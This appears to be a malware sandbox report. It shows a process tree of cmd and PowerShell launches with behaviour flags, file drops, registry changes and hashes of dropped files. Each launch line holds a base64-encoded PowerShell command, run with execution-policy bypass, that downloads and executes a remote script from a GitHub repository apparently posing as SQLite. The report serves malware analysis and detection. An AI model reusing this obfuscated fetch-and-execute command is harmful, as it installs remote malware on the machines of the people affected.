C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:3964
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:3780
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1632
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
dd2bd9e89f270d2cadc103665c9f48d3
SHA1ba70dfe57ec4a7295c9c6e3bdf16e151d086c509
SHA256213e58dda308f6e59ee98a451cf2869e67e4611521967d98a3c32b67eea65561
SHA5123061041007dfc13ca3f658ee5fe06a2b01c759c5507dc4c3075cf2f45ab7a9d7121476e5df7fdc4243ca0620c9f7fb8082f897d0561371d30967aa7fcc147453
-
MD5
f784c76a5f451d89ecd31dc71a8c26cb
SHA181b9f4163f834ea3cf133e2be9b8b81279e41c6b
SHA2568d77e8f87f57c3cc6c5b19ea782763c6a4c3c18ee750357c050543d913e6ac9f
SHA5125b8fd465141921c4791739fe5186b615594ae47e16c568fe6a640cb67c21aa25b0e1b5910c3eb56cf3a23ce4c6d251664e132a3007956ed3453dce3d1f713981
-
MD5
131ca5240a8c5574648dfc8239478f34
SHA1b0150dc97e296f82881cf3ab75e52fb048f16dc4
SHA256d6a66d935fa38011c2e25cd50d5dec88505154eadf43ec3de306047586d89746
SHA512ff12ab0ddec4abed31d8f83ec53ee5c1c9be1ea02c89ef6ce7acf5850357cb9c9b6157d33b6242d3318766de96991614f3f49b03b109ecf92da42acde57b249d
-
MD5
28d9755addec05c0b24cca50dfe3a92b
SHA17d3156f11c7a7fb60d29809caf93101de2681aa3
SHA256abb6ceb444b3dc29fcdcb8bda4935a6a792b85bb7049cb2710d97415d9411af9
SHA512891a72eeef42be3f04067225a9665020704c99f9c17473ca57e5b946dfa35cb469fa91a794ea30115ce3ed0e940edb3ccff69a16a888379f5ac46a12afaa4c42
-
MD5
d12b1ff3595abef1e967e7810a903ae0
SHA162112b3f78a7668b5fbc9d5c1e814ac4bb6b261f
SHA256cf8f1e066b891d4fea84020d0c1b44cba113c14353e57d3a9854f848418b688b
SHA512ef0f0e28bfe06eb2da9f19cf338562a1960f99d61cf8160dee19778c00bed650cc02a38c3b30ddc1c38e54d4c3a25dd9a3ca645c3bb72302cd7a7791f5196f18
-
MD5
9f8ab7eb0ab21443a2fe06dab341510e
SHA12b88b3116a79e48bab7114e18c9b9674e8a52165
SHA256e1a4fbe36125e02e100e729ce92ab74869423da87cb46da6e3c50d7c4410b2d9
SHA51253f5dc4c853af5a412fde895635ef4b2de98a165e3546130fdd17a37a5c3b177e21eccf70a5ddf936ac491da2d7e8fcdbc1e564a95ec01b097841aa78869989b
-
MD5
755df1ce73deb575fea1a4ae46275374
SHA1487a61f48c88b5e92df5c706077ea410a5e5cdfb
SHA256a171aea10a12a09c4ca7ed50515b76a866d51f5d6cc5478fa690f958f0c2d1be
SHA512611fe0199da71c20a2c4ddc9105d879fbdafe4594f3bd61521dc24c7cabbae80e5c3c62a47c7a4037eab0bbe9b71453b979e04b893a26b9d67387eb675f9975b
-
MD5
02de1d05ec7c49607d0469e7731760c6
SHA139f0cddc616ab7ccfd0030f9aa257d6603373fb6
SHA256dcb3e99447dd9c7093c425de2dc13d18342299d6b3876542c8b18542b80ec9eb
SHA512a33b3da342c96816477347e0dfb6a54b2202990370260aa7fb3de6774c6868a9abef8ec1c794115d927432346153663a600142ca86701adaf1cde2b28f749f82
-
MD5
a82cc23d45b8e1de9897fa40dbfebecb
SHA116590d3f0a035e0c01a9959593dd35b5d417a18e
SHA256300f336a781a00987d35d4db230a14f96d3566ad324d8a5f9b0193095ef3d821
SHA512b644dc69e2937ce23dd0e49f19bf1541f3e72fc9d1ff1a27d9ec009ad908fc19d8470c11dfe49a305cc9db278d684c31553107f8f4808a157e6c2a3873f5025a